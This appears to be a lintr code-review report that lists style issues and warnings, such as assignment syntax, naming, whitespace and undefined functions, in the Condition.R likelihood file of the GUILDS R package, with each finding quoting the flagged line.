\n^\n```\n[R/Condition.R:62:18:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:62:54:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:66:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:69:7:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin\n      ^\n```\n[R/Condition.R:70:7:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin\n      ^\n```\n[R/Condition.R:71:7:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0\n      ^\n```\n[R/Condition.R:72:7:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1\n      ^\n```\n[R/Condition.R:73:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps\n     ^\n```\n[R/Condition.R:75:2:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n ^~~~~~~~~~\n```\n[R/Condition.R:75:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n             ^\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:54:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:77:2:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n ^~~~~~~~~~~\n```\n[R/Condition.R:77:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L77) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n             ^\n```\n[R/Condition.R:77:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:80:4:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:80:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:52:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n                                                   ^\n```\n[R/Condition.R:85:32:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L85) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g, c(eps,xmax)))$root\n                               ^\n```\n[R/Condition.R:88:4:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:88:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:90:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:94:26:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L94) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot( h,c( xmax, 1 - eps)))$root\n                         ^\n```\n[R/Condition.R:97:2:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:98:15:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:104:24:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  aux <- integrate(f = calcLLEXP,\n                       ^~~~~~~~~\n```\n[R/Condition.R:111:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  return(LL);  \n             ^~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:118:3:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L118) *warning:* **local variable ‘Sx’ assigned but may not be used**\n```r\n​  Sx = length(SADX)\n  ^~\n```\n[R/Condition.R:118:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L118) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L119) *warning:* **local variable ‘Sy’ assigned but may not be used**\n```r\n​  Sy = length(SADY)\n  ^~\n```\n[R/Condition.R:119:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L119) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:120:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L120) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:121:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L121) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:122:3:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L122) *warning:* **local variable ‘J’ assigned but may not be used**\n```r\n​  J = Nx + Ny\n  ^\n```\n[R/Condition.R:122:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L122) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:123:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:126:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L126) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(verbose == TRUE) {\n    ^\n```\n[R/Condition.R:128:55:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\"); \n                                                      ^\n```\n[R/Condition.R:130:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L130) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:130:45:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L130) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:131:50:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Theta Y =\", \"Theta X\", \n                                                 ^\n```\n[R/Condition.R:133:50:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L133) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                ~^\n```\n[R/Condition.R:133:51:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L133) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                  ^\n```\n[R/Condition.R:134:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L134) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:134:45:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L134) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:137:49:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L137) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                            ~~~~^\n```\n[R/Condition.R:137:50:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L137) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                                 ^\n```\n[R/Condition.R:141:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L141) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L142) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:143:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L145) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:151:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:152:72:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L152) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                       ^\n```\n[R/Condition.R:152:73:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                        ^~\n```\n[R/Condition.R:153:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L153) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L159) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:162:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:163:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L163) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:167:18:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L167) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:167:19:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:168:13:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:168:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:168:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:168:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:170:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:171:9:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:60:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L171) *style:* **Trailing whitespace is superfluous.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n                                                           ^\n```\n[R/Condition.R:174:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L174) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L175) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L180) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L180) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:46:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:181:53:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                             method, \n                                                    ^\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L184) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L184) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L185) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L185) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:186:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:189:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L189) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/Condition.R:190:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L190) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:191:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L191) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n             ^\n```\n[R/Condition.R:191:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L191) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/Condition.R:192:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L192) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:195:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L195) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x2)) freq_y[i] <- x2[[i]]\n     ^\n```\n[R/Condition.R:196:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:197:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L197) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n             ^\n```\n[R/Condition.R:197:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L197) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n                ^\n```\n[R/Condition.R:199:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L199) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:200:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L200) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:201:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L201) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:202:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L202) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:203:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L203) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:206:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:213:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L213) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"simplex\") {\n    ^\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L214) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:214:18:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L214) *style:* **Variable and function names should be all 